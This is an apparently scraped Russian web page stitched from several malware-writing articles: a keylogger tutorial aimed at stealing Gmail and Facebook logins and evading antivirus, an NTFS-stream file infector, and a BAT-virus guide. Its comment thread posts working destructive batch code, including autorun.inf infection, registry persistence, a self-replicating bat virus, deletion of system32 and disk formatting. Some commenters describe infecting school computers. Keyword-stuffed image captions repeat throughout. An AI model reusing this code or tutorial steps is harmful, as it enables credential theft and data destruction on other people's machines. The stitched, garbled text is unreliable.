как выглядит код вируса

Что такое вредоносный код?

как выглядит код вируса. malicious programs img 03. как выглядит код вируса фото. как выглядит код вируса-malicious programs img 03. картинка как выглядит код вируса. картинка malicious programs img 03. Это тип угрозы, которую, по данным «Лаборатории Касперского», могут блокировать далеко не все защитные решения.

Это тип угрозы, которую, по данным «Лаборатории Касперского», могут блокировать далеко не все защитные решения.

Дело в том, что вредоносный код и вредоносное ПО – не одно и то же: под вредоносным ПО имеется в виду исключительно программное обеспечение, тогда как вредоносный код представляет собой скрипты веб-сайта, которые могут использовать уязвимости для загрузки вредоносного ПО.

Это автоматически исполняемое приложение, которое может активировать само себя и принимать различные формы, включая Java-апплеты, элементы управления ActiveX, размещенный контент, плагины, языки сценариев или другие языки программирования, предназначенные для улучшения веб-страниц и электронной почты.

Вредоносный код предоставляет киберпреступникам возможность получить несанкционированный удаленный доступ к атакованной системе (такая программа называется «бэкдор») и похитить важные данные компании.

Используя бэкдор, злоумышленники могут также уничтожить данные компьютера или установить на нем шпионское ПО. Этой угрозе могут подвергаться организации очень высокого уровня.

Скрипты, черви и вирусы могут нанести вред вашему компьютеру, находя точки входа, через которые они получат доступ к вашим ценным данным.

Посещение зараженных сайтов или нажатие на непроверенную ссылку во вложении к электронному сообщению являются основными воротами, через которые вредоносный код проникает в вашу систему.

Антивирусное ПО, которое включает автоматические обновления, возможности удаления вредоносных программ, защиту веб-браузера и функцию обнаружения всех типов заражений, является лучшей защитой.

Источник

Пишем свое вредоносное ПО. Часть 1: Учимся писать полностью «не обнаружимый» кейлогер

как выглядит код вируса. 33f774e3b6ad4b42a11616d133a5ab2f. как выглядит код вируса фото. как выглядит код вируса-33f774e3b6ad4b42a11616d133a5ab2f. картинка как выглядит код вируса. картинка 33f774e3b6ad4b42a11616d133a5ab2f. Это тип угрозы, которую, по данным «Лаборатории Касперского», могут блокировать далеко не все защитные решения.

Хакерский мир можно условно разделить на три группы атакующих:

1) «Skids» (script kiddies) – малыши, начинающие хакеры, которые собирают известные куски кода и утилиты и используя их создают какое-то простое вредоносное ПО.

2) «Byuers» — не чистые на руку предприниматели, тинэйджеры и прочие любители острых ощущений. Покупают услуги по написанию такого ПО в интернете, собирают с ее помощью различную приватную информацию, и, возможно, перепродают ее.

3) «Black Hat Сoders» — гуру программирования и знатоки архитектур. Пишут код в блокноте и разрабатывают новые эксплоиты с нуля.

Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО.

Зачем ИБ-персоналу эти сомнительные навыки?

Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно.

Для этого неформального класса «hacking 101» вам необходимы небольшие знания в программировании (С# и java) и базовое понимание архитектуры Windows. Имейте ввиду, что в реальности вредоносное ПО пишется на C/C++/Delphi, чтобы не зависеть от фреймфорков.

Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры.
Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине.

Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили.

Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#:

Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN:

Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры:

Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику.

Умный кейлогер

Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений?
Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть.

Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я увеличиваю шансы получения учетных данных.

Вторая версия кода:

Этот фрагмент будет выявлять активное окно каждые 100мс. Делается это с помощью функции GetForegroundWindow (больше информации на MSDN). Заголовок страницы хранится в переменной buff, если в ней содержится gmail или facebook, то вызывается фрагмент сканирования клавиатуры.

Этим мы обеспечили сканирование клавиатуры только когда открыто окно браузера на сайтах facebook и gmail.

Еще более умный кейлогер

Давайте предположим, что злоумышленник смог получить данные кодом, на подобии нашего. Так же предположим, что он достаточно амбициозен и смог заразить десятки или сотни тысяч машин. Результат: огромный файл с гигабайтами текста, в которых нужную информацию еще нужно найти. Самое время познакомиться с регулярными выражениями или regex. Это что-то на подобии мини языка для составления неких шаблонов и сканирования текста на соответствие заданным шаблонам. Вы можете узнать больше здесь.

Для упрощения, я сразу приведу готовые выражения, которые соответствуют именам логина и паролям:

Эти выражения здесь как подсказка тому, что можно сделать используя их. С помощью регулярных выражений можно искать (т найти!) любые конструкции, которые имеют определенный и неизменный формат, например, номера паспортов, кредитных карт, учетные записи и даже пароли.
Действительно, регулярные выражения не самый читаемый вид кода, но они одни из лучших друзей программиста, если есть задачи парсинга текста. В языках Java, C#, JavaScript и других популярных уже есть готовые функции, в которые вы можете передать обычные регулярные выражения.

Для C# это выглядит так:

Где первое выражение (re) будет соответствовать любой электронной почте, а второе (re2) любой цифро буквенной конструкции больше 6 символов.

Бесплатно и полностью не обнаружим

В своем примере я использовал Visual Studio – вы можете использовать свое любимое окружение – для создания такого кейлогера за 30 минут.
Если бы я был реальным злоумышленником, то я бы целился на какую-то реальную цель (банковские сайты, соцсети, тп) и видоизменил код для соответствия этим целям. Конечно, также, я запустил бы фишинговую кампанию с электронными письмами с нашей программой, под видом обычного счета или другого вложения.

Остался один вопрос: действительно такое ПО будет не обнаруживаемым для защитных программ?

Я скомпилировал мой код и проверил exe файл на сайте Virustotal. Это веб-инструмент, который вычисляет хеш файла, который вы загрузили и ищет его в базе данных известных вирусов. Сюрприз! Естественно ничего не нашлось.

как выглядит код вируса. 622cb4f554354418bc6d5471d9e42469. как выглядит код вируса фото. как выглядит код вируса-622cb4f554354418bc6d5471d9e42469. картинка как выглядит код вируса. картинка 622cb4f554354418bc6d5471d9e42469. Это тип угрозы, которую, по данным «Лаборатории Касперского», могут блокировать далеко не все защитные решения.

В этом основная фишка! Вы всегда можете менять код и развиваться, будучи всегда на несколько шагов раньше сканеров угроз. Если вы в состоянии написать свой собственный код он почти гарантированно будет не обнаружим. На этой странице вы можете ознакомиться с полным анализом.

Основная цель этой статьи – показать, что используя одни только антивирусы вы не сможете полностью обеспечить безопасность на предприятии. Нужен более глубинная оценка действий всех пользователей и даже сервисов, чтобы выявить потенциально вредоносные действия.

В следующих статья я покажу, как сделать действительно не обнаружимую версию такого ПО.

Источник

Как написать вирус для windows

как выглядит код вируса. virus intro and virus writing 13 638. как выглядит код вируса фото. как выглядит код вируса-virus intro and virus writing 13 638. картинка как выглядит код вируса. картинка virus intro and virus writing 13 638. Это тип угрозы, которую, по данным «Лаборатории Касперского», могут блокировать далеко не все защитные решения.

C чего начать писать вирус для windows?

Итак, давай погрузимся в мрачный лабиринт кибернетического мира, ряды обитателей которого скоро пополнятся еще одним зловредным созданием. Внедрение вируса в исполняемый файл в общем случае достаточно сложный и мучительный процесс. Как минимум для этого требуется изучить формат PE-файла и освоить десятки API-функций. Но ведь такими темпами мы не напишем вирус и за сезон, а хочется прямо здесь и сейчас. Но хакеры мы или нет? Файловая система NTFS (основная файловая система Windows) содержит потоки данных (streams), называемые также атрибутами. Внутри одного файла может существовать несколько независимых потоков данных.

как выглядит код вируса. vir 01. как выглядит код вируса фото. как выглядит код вируса-vir 01. картинка как выглядит код вируса. картинка vir 01. Это тип угрозы, которую, по данным «Лаборатории Касперского», могут блокировать далеко не все защитные решения.Файловая система NTFS поддерживает несколько потоков в рамках одного файла

Будем мыслить так: раз создание дополнительных потоков не изменяет видимых размеров файла, то пребывание в нем постороннего кода, скорее всего, останется незамеченным. Тем не менее, чтобы передать управление на свой поток, необходимо модифицировать основной поток. Контрольная сумма при этом неизбежно изменится, что наверняка не понравится антивирусным программам. Методы обмана антивирусных программ мы рассмотрим в дальнейшем, а пока определимся со стратегией внедрения.

Алгоритм работы вируса

Закрой руководство по формату исполняемых файлов (Portable Executable, PE). Для решения поставленной задачи оно нам не понадобится. Действовать будем так: создаем внутри инфицируемого файла дополнительный поток, копируем туда основное тело файла, а на освободившееся место записываем наш код, который делает свое черное дело и передает управление основному телу вируса.

Работать такой вирус будет только на Windows и только под NTFS. На работу с другими файловыми системами он изначально не рассчитан. Например, на разделах FAT оригинальное содержимое заражаемого файла будет попросту утеряно. То же самое произойдет, если упаковать файл с помощью ZIP или любого другого архиватора, не поддерживающего файловых потоков.

В качестве примера архиватора, поддерживающего файловые потоки, можно привести WinRAR. Вкладка «Дополнительно» в диалоговом окне «Имя и параметры архива» содержит группу опций NTFS. В составе этой группы опций есть флажок «Сохранять файловые потоки». Установи эту опцию, если при упаковке файлов, содержащих несколько потоков, требуется сохранить их все.

Основная ошибка большинства вирусов состоит в том, что, однажды внедрившись в файл, они сидят и покорно ждут, пока антивирус не обнаружит их и не удалит. А ведь сканирование современных винчестеров занимает значительное время, зачастую оно растягивается на многие часы. В каждый момент времени антивирус проверяет всего один файл, поэтому, если вирус ведет кочевую жизнь, мигрируя от одного файла к другому, вероятность, что его обнаружат, стремительно уменьшается.

Мы будем действовать так: внедряемся в файл, ждем 30 секунд, удаляем свое тело из файла, тут же внедряясь в другой. Чем короче период ожидания, тем выше шансы вируса остаться незамеченным, но и тем выше дисковая активность. А регулярные мигания красной лампочки без видимых причин сразу же насторожат опытных пользователей, поэтому приходится хитрить.

Например, можно вести мониторинг дисковой активности и заражать только тогда, когда происходит обращение к какому-нибудь файлу. В решении этой задачи нам поможет специализированное ПО, например монитор процессов Procmon.

Программный код вируса для windows

Естественные языки с описанием компьютерных алгоритмов практически никогда не справляются. Уж слишком эти языки неоднозначны и внутренне противоречивы. Поэтому, во избежание недоразумений, продублируем описание алгоритма на языке ассемблера. Вот исходный код нашего вируса.

Компиляция и тестирование вируса для windows

Для компиляции вирусного кода нам понадобится транслятор FASM, бесплатную Windows-версию которого можно найти на сайте flatassembler.net. Остальные трансляторы (MASM, TASM) тут непригодны, так как они используют совсем другой ассемблерный синтаксис.

Скачай последнюю версию FASM для Windows, распакуй архив и запусти приложение fasmw.exe. Скопируй исходный код вируса в окошко программы и выполни команды Run → Compile, а затем укажи, в какую папку сохранить скомпилированный исполняемый файл.

как выглядит код вируса. notepad. как выглядит код вируса фото. как выглядит код вируса-notepad. картинка как выглядит код вируса. картинка notepad. Это тип угрозы, которую, по данным «Лаборатории Касперского», могут блокировать далеко не все защитные решения.Диалоговое окно, свидетельствующее об успешном заражении

Если попытка заражения потерпела неудачу, первым делом необходимо убедиться, что права доступа к файлу есть. Захватывать их самостоятельно наш вирус не умеет. Во всяком случае — пока. Но вот настоящие вирусы, в отличие от нашего безобидного лабораторного создания, сделают это непременно.

Теперь запусти зараженный файл notepad.exe на исполнение. В доказательство своего существования вирус тут же выбрасывает диалоговое окно, показанное на рисунке, а после нажатия на кнопку ОK передает управление оригинальному коду программы.

как выглядит код вируса. hacked WiHRjFk. как выглядит код вируса фото. как выглядит код вируса-hacked WiHRjFk. картинка как выглядит код вируса. картинка hacked WiHRjFk. Это тип угрозы, которую, по данным «Лаборатории Касперского», могут блокировать далеко не все защитные решения.Диалоговое окно, отображаемое зараженным файлом при запуске на исполнение

Чтобы фокус сработал в Windows 10, вирус должен быть запущен от имени администратора.

Чтобы не возбуждать у пользователя подозрений, настоящий вирусописатель удалит это диалоговое окно из финальной версии вируса, заменив его какой-нибудь вредоносной начинкой. Тут все зависит от вирусописательских намерений и фантазии. Например, можно перевернуть экран, сыграть над пользователем еще какую-нибудь безобидную шутку или же заняться более зловредной деятельностью вроде похищения паролей или другой конфиденциальной информации.

До сих пор рассматриваемый вирус действительно был абсолютно безобиден. Он не размножается и не выполняет никаких злонамеренных или деструктивных действий. Ведь он создан лишь для демонстрации потенциальной опасности, подстерегающей пользователей NTFS. Исследовательская деятельность преступлением не является. Но вот если кто-то из вас решит доработать вирус так, чтобы он самостоятельно размножался и совершал вредоносные действия, то следует напомнить, что это уже станет уголовно наказуемым деянием.

Еще одна проблема заключается в том, что вирус не корректирует длину целевого файла и после внедрения она станет равной 4 Кбайт (именно таков размер текущей версии исполняемого файла вируса). Это плохо, так как пользователь тут же заподозрит подвох (файл explorer.exe, занимающий 4 Кбайт, выглядит довольно забавно), занервничает и начнет запускать антивирусы. Чтобы устранить этот недостаток, можно запомнить длину инфицируемого файла перед внедрением, затем скопировать в основной поток тело вируса, открыть файл на запись и вызвать функцию SetFilePointer для установки указателя на оригинальный размер, увеличивая размер инфицированного файла до исходного значения.

Заключение

Используй полученные знания с осторожностью, изучай ассемблер, не забывай мыть руки перед едой и всегда помни о том, что создание вирусов в каких-либо иных целях, кроме исследовательских, не только очень веселое, но еще и противозаконное занятие. А закон, как любил говорить один литературный персонаж, надо чтить!

Источник

Как выглядит код вируса

. ТО я решил писать вирус на нем, и оказалось это не так трудно.

Вот тело моего первого вируса

Объясняю популярно и по шагам:

Идем дальше, пишем новый вирус. Те функции, которые были упомянуты уже, не будут объясняться заново. Это просто усовершенствованная версия прошлого вируса.

А теперь, что-то новое.

Тут мало нового но уже что-то. Идем дальше. Накачал я с инета BAT-вирусов и начал их исследовать. И вот результаты:
Написал еще пару своих:

copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход

О какие бывают вирусы. И на что только ни ухитряются вирусописатели, чтобы добиться нужного результата. Прочитав эту доку ты с уверенностью сможешь сам написать BAT вирус, даже лучше моего ;).Ну удачи тебе в написании вирей, а я отклонюсь и свалю пить пиво %-).

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.

Комментарии

Комментарий от neuda4nik [ Июнь 13, 2008, 00:01 ]
Комментарий от Dos_Atacker [ Июнь 29, 2008, 09:39 ]

Слушай, ништяк братишка, пишешь! Только в следующий раз, если не сложно, пояснения выделяй! А так, отлично проделаная работа! Даже несколько команд для себя нашел =)

Комментарий от Ну я, и что. [ Июль 18, 2008, 12:51 ]

Хорошая статья.Всё понятно написано.А есть команда, чтоб вирус запускался в определённое время и дату?Напиши плиз в e-mail.

Комментарий от Лёха [ Август 3, 2008, 00:29 ]

Хорошая статья.Всё понятно написано.А есть команда, чтоб вирус запускался в каждый
месяцев на дату Напиши плиз в e-mail.

Писать вирусы не хорошо. =) Лучше пиши программы, на них хоть денег заработать можно. А вирусы тока вред приносят.

Комментарий от влад [ Август 26, 2008, 16:53 ]

) Да-уж…… ну вот вам ещй один в копилку знаний написал за 10 минут

echo Windows Registry Editor Version 5.00 > %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %temp%\run.reg
echo «svchost.exe»=»Buldozer.bat» >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents] >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\IMAIL] >> %temp%\run.reg
echo «Installed»=»1″ >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MAPI] >> %temp%\run.reg
echo «Installed»=»1″ >> %temp%\run.reg
echo «NoChange»=»1″ >> %temp%\run.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\MSFS] >> %temp%\run.reg
echo «Installed»=»1″ >> %temp%\run.reg

regedit /s %temp%\run.reg

attrib +H %windir%\system32\Buldozer.bat

echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(«теперь питание компьютера можно выключить»); >> %temp%\mes.js
start %temp%\mes.js

если что пишите…….. 2920636

Комментарий от Romzes [ Декабрь 9, 2008, 06:30 ]

rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ‘ ‰?ђ Ќ ё.%Н.Ќ є Н’ђђ //

ЧТО ЭТИ КАРАКУЛИ ДЕЛАЮТ?

Комментарий от Ди2 [ Декабрь 25, 2008, 19:56 ]

а как вылечица то от этого вируса.

Комментарий от vi-rus [ Февраль 22, 2009, 13:31 ]

Огромное спасибо этому человеку.О-о-о-очень,очень
интересная работа.Пойду изучать!

Комментарий от Виктор [ Март 31, 2009, 18:44 ]

Может кто подскажет как это запихнуть через сеть в автозагрузку незаметно и как потом лечить.

Комментарий от Ромик [ Июнь 15, 2009, 22:09 ]

rundll32 keyboard,disable
и
rundll32 keyboard,enable

Комментарий от DEMOH [ Сентябрь 7, 2009, 18:35 ]

ваще гениально — я паш в програмировании паскаля малеха, а вот в скриптовых пока никак…. тока вот я не понял, сам еффект от 2-го кода…

Комментарий от NumeN [ Октябрь 10, 2009, 18:31 ]

Если кто может напишет в e-mail все операторы и иx значения. Очень нужно узнать.
HELP.

Комментарий от Vahik [ Октябрь 14, 2009, 17:52 ]
Комментарий от Artem(нач. хакер_) [ Октябрь 27, 2009, 18:45 ]
Комментарий от microteam [ Ноябрь 7, 2009, 22:29 ]

стaтья сyпep.пpишлитe нa мыло вce кoмaнды bat-фaйлoв,плиз.sergei-pit_bull@mail.ru

Комментарий от sergey [ Ноябрь 11, 2009, 21:48 ]
Комментарий от NEoM@STER [ Ноябрь 13, 2009, 21:29 ]

shutdown /r /t 20 /c «Ну ты и лошара» >nul

Комментарий от Андрей [ Ноябрь 21, 2009, 20:40 ]

ЛЮДИ. ХЭЛП. я решил загадить компьютеры учителям в школе,написал вирь,скинул на рабочий стол учителя!НО они его не открывают. есть какое то решение моей проблемы или нет. ответы оставляйте в комментах или на мыло! заранее СПС

Комментарий от pik[neac] [ Ноябрь 23, 2009, 14:40 ]

закинь в автозагрузку в ручную

Комментарий от Руслан [ Ноябрь 23, 2009, 20:05 ]

1 Что будет если я его в авто загрузку закину?
2 Где она находится.

pik[neac], автозагрузка находится сдесЬ: Пуск/Программы/Автозагрузка

Комментарий от pik[neac] [ Ноябрь 24, 2009, 15:22 ]
Комментарий от levinter [ Декабрь 9, 2009, 22:23 ]

А можно это как-то вконтакте кинуть, ссылку типо?

Комментарий от Derbian [ Декабрь 20, 2009, 10:09 ]

Плизз моля помогите как писать сам бат как вы пишите вот эти комбинации и получается вир как писать такие комбинации плиз киньте на мыло:zaikaodnoyaika@mai.ru

Комментарий от Рома [ Декабрь 27, 2009, 21:07 ]

И кто знает вконте можно кого-нибудь заразить вир и как?

Комментарий от Рома [ Декабрь 27, 2009, 21:08 ]

скажите команду для перезагрузки компа ы выкл

Комментарий от Влад [ Декабрь 31, 2009, 06:17 ]
Комментарий от GRO88 [ Январь 4, 2010, 00:04 ]

Статья не очень, многие команды уже палятся каспером
(например отключение клавы и мышки)

Комментарий от Ветал [ Январь 4, 2010, 21:49 ]
Комментарий от levinter [ Январь 4, 2010, 22:09 ]

мдя ну ти витал и лох….. даже добавить нечего….во первых эти команды палятся уже давно так как ета команда в основном в червях используется…. ну если хакер не ламер то можно сначала удалить касперского на такой случай… а да еще гдето видел такое помоему в макро вирусе команду против обноружения антивирусом….

Люди а вы 3наете что можно обойтись и 5-ими строчками чтобы сломать всю систему)))

Комментарий от levinter [ Январь 6, 2010, 21:40 ]

ну и где твои 5 строчек просвяти народ епт)))

Комментарий от morgan [ Январь 10, 2010, 11:02 ]

тока винд сломать можно

Комментарий от levinter [ Январь 10, 2010, 19:21 ]

Ребят, конечно все красиво, но зачем все так усложнять? Зачем писать такой большой код? Посмотрел я все изложенные тут вирусы и убедился, что их результат работы — прекращение стабильной загрузки Windows, но зачем такой большой код, если для этого достаточно удалить всего один 1 файл? В корневом катологе загрузочного диска удаляете файл скрытый файл ntldr простой командой del… и все…

Комментарий от Серж [ Январь 14, 2010, 00:09 ]

кто знает какую команду в батнике прописать что бы выполняемый батник не выводил окно доса.
я нашел ток через скрипт типа файл *.vbs с текстом
Dim Shell

set Shell = CreateObject(«WScript.Shell»)

запукает батник start.bat скрыто.

Комментарий от vovfka [ Январь 14, 2010, 14:36 ]

ну и лол смотри
@fomat C:\ /q
вот и все нуб

Комментарий от levinter [ Январь 14, 2010, 15:35 ]

ВСЕ — ТУПОЙ, БЕСМЫССЛЕННЫЙ БРЕД. дс — какой то.

Комментарий от Mila [ Январь 15, 2010, 08:07 ]

vovfka запуск в свернутом режиметут гдето был написан глянь внимательно ктото уже писал

Комментарий от levinter [ Январь 15, 2010, 20:07 ]

Блять я етот вирус на себе запустил и нифига =(

Комментарий от Лёша [ Январь 16, 2010, 00:58 ]

давай я вирь напишу охуееш…. тут просто есть удаленые модули поетому

Комментарий от levinter [ Январь 16, 2010, 22:00 ]

я долго ржал над другом

Комментарий от женя [ Январь 21, 2010, 00:00 ]

здорова чуваки. я в школе все компы заразил этой хуйнёй,мой вирь
запускается раз в 4 дня и заражает файлы почти всех форматов.Вот код для заражения:jpg,gif,mp3,midi,bat,ini,rar….короче что хотите.

Комментарий от xaker [ Январь 24, 2010, 20:24 ]

мдяяяяяяя вот зачем ета строка «MrWeb»c:MrWeb.bat оператор find означает поиск
и рас в 4 дня он не запустится… потом еще если висать куда нить %2 то просто сам себя запустит а не сам вирь вить дос не знает что имели ввиду програму которая суда ето вписала

Комментарий от levinter [ Январь 26, 2010, 19:21 ]

Вирус должен заражать, а не портить код жертвы. гуглите конструктор bat вирусов «BVGMIX» — он создает настоящие bat вирусы. Например:
—————————
@echo off%[ViRuS]%
set ViRuSorX=*.ba
if ‘%1==’vnPY goto ViRuSKIQk
if ‘%1==’uBwOLNA goto ViRuSAAy
if exist c:\ViRuS.bat goto ViRuSkxQs
if not exist %0 goto ViRuSGcy
find «ViRuS»c:\ViRuS.bat
attrib +h c:\ViRuS.bat
:ViRuSkxQs
for %%q in (.) do call c:\ViRuS.bat uBwOLNA %%

sq
goto ViRuSGcy
:ViRuSAAy
for %%S in (%2\%ViRuSorX%t) do call c:\ViRuS.bat vnPY %%

sS
goto ViRuSGcy
:ViRuSKIQk
find «ViRuS»nul
if not errorlevel 1 goto ViRuSGcy
echo.>>%2%[ViRuS]%
type c:\ViRuS.bat>>%2
:ViRuSGcy
————————-

мля. самый простой вирь!!
rd /s/q D:\WINDOWS\system32
копируем его дядьке преподу его в автозагр. и все!!этого достаточно!!

Комментарий от Gol [ Январь 27, 2010, 22:50 ]
Комментарий от Колян [ Январь 29, 2010, 23:08 ]
Комментарий от romka747 [ Январь 31, 2010, 15:37 ]
Комментарий от romka747 [ Январь 31, 2010, 16:36 ]

люди напишите кто нибудь код чтоб вирус сам запускался в заданное время или дату.очень надо.

Комментарий от Саня [ Февраль 1, 2010, 17:26 ]

[red][blink]Хуйня это всё:)гггг[/blink][/red] [green][blink]Пишите на мыло, кому нужен bat вирусы… напишу любой![/blink][/green]

аааааа сук…. не работает тут…. мля….

Ну да, отключим антивирь и твой вирь попадет в нашу систему, отлично придумал 🙂

кто может взломать счасливий фермер вконтакте прошу подскажите!

Комментарий от ыыы [ Февраль 5, 2010, 20:57 ]

pik[neac] поменяй файле иконку например как в папке!!

Комментарий от vlad [ Февраль 10, 2010, 21:20 ]

JuseS +1 но для начала норм (поучится) даж нахожу для себя новым и интересным ^^

Когда наткнулся на статейку редактировал свой тупой вирус^^:

Как правильно указать путь к файлу
c:\Program Files\ХРЕН\Application\*.ехе
пробовал
c:\Progra

1\*.exe
Ругается на руский шрифт папки.

Комментарий от Nickers [ Май 15, 2010, 11:43 ]

Обращайте внимание под какую Винду это пишется, под Вистой и 7 некоторые команды не робят, а так, спасиб автору, понятно и доходчиво.

Комментарий от Green [ Июль 28, 2010, 10:06 ]

А когда мышь отключаешь она после перезагрузки работать будет?

Комментарий от Вова [ Август 6, 2010, 20:14 ]

А вот простейшый вирус
@echo
time 12:00
date 01/09/2010

Комментарий от Slava [ Август 19, 2010, 11:29 ]

rundll32 user,wnetdisconnectdialog
Окно “Отключение сетевого диска” Вызвать

rundll32 user,disableoemlayer
Сбой пpовоциpовать

rundll32 user,repaintscreen
Обновить (как )

rundll32 user,setcursorpos
Maus-Cursor слева ввеpх посадить

rundll32 diskcopy,DiskCopyRunDll
Окно “Copy Disk” вызвать

rundll32 rnaui.dll,RnaWizard /1
Диалог “Установка Связи” вызвать (/1 = без окна)

rundll32 shell,shellexecute
Explorer-Окно откpыть в коpневом каталоге

rundll32 shell32,OpenAs_RunDLL
Окно “Откpыть с помощью…” вызвать***

rundll32 shell32,SHFormatDrive
Окно “Фоpматиpование: Диск3,5(А)” вызвать

rundll32 shell32,ShellAboutA
Info-Box (о Windows) вызвать

rundll32 shell32,SHExitWindowsEx 0
Windows 98 заново стаpтанyть (без autoexec.bat и дp.)

rundll32 shell32,SHExitWindowsEx 1
Работy с Windows 98 закончить

rundll32 shell32,SHExitWindowsEx 2
Windows-98-PC boot

rundll32 shell32,Control_RunDLL
Откpыть окно “Панель yпpавления”

rundll32 shell32,Control_RunDLL desk.cpl
Откpыть “Свойства Экpана”

rundll32 shell32,Control_RunDLL main.cpl
Откpыть Modul-Панели yпpавления из MAIN.CPL **

rundll32 krnl386.exe,exitkernel
выход из Windows без любых сообщений/вопpосов

rundll32 user,swapmousebutton
“Пеpеставить” клавиши мыши *

rundll32 keyboard,disable
“Отключить” клавиатypy *

rundll32 mouse,disable
“Отключить” мышь *

rundll rnaui.dll,RnaDial “пpовайдеp”
Вызвать окно “Установка связи” с именем “пpовайдеp”

rundll32 user,tilechildwindows
выстpоить все не свёpнyтые окна свеpхy вниз

rundll32 user,cascadechildwindows
выстpоить все не свёpнyтые окна каскадом

rundll32 sysdm.cpl,InstallDevice_Rundll
(единств. возможность в W98) yстановить non-Plug&Play обоpyдование

rundll32 msprint2.dll,RUNDLL_PrintTestPage
выбpать в появившемся меню пpинтеp и послать а него тест

rundll32 user,setcaretblinktime
yстановить новyю частотy мигания кypсоpа *

rundll32 user, setdoubleclicktime
yстановить новyю скоpость двойного нажатия *

Ну а если хочешь “убить” Windows то:
@echo off
start explorer
start explorer
start explorer
start explorer — повторить ещё раз 100 и прописать в автозагрузку.

Комментарий от Device [ Август 25, 2010, 10:01 ]

explorer жёстко грузит центральный процессор если запустить несколько раз что и делает батник то всё твой комп труп

Комментарий от Device [ Август 25, 2010, 10:04 ]
Комментарий от 1q [ Сентябрь 4, 2010, 09:07 ]

Работает в sp2 в sp3 могут некорректо работать некоторые функции bat пакета.

1)строчка отключает клавиатуру.
2)cтрочка отключает мышь.
3)строчка перегружает компьютер.
4)инсталирует запись в реестр без запроса, за счет переменной /s.

затем создаем module.reg фаил.
в нем пишем.
Windows Registry Editor Version 5.00

Для чего была добавлена запись в раздел paint? Для того что бы при запуске системы, запускался паинт, а вместе с ним, запускался наш модуль.bat

после указываем путь и упаковываем module.reg с помощью SFX

Затем берем джойнер беспалевный. А это тот, который напишешь сам. И клеим module.exe и module.bat

получается module.exe единый файл.
При его запуске, с учетом того что у жертвы SP2,
Компьютер жертвы будет перезагружаться.
Причем не будет видно в автозагрузке вредоностную программу.

По поводу написания программ на C++, пишите мне в icq 248022

че за красавчик того все….я не читал коменты да и пофигу на них тот кто написал эт красаууелла

Комментарий от HIM1 [ Сентябрь 5, 2010, 15:56 ]

Автор ++ молодец спс за материал!

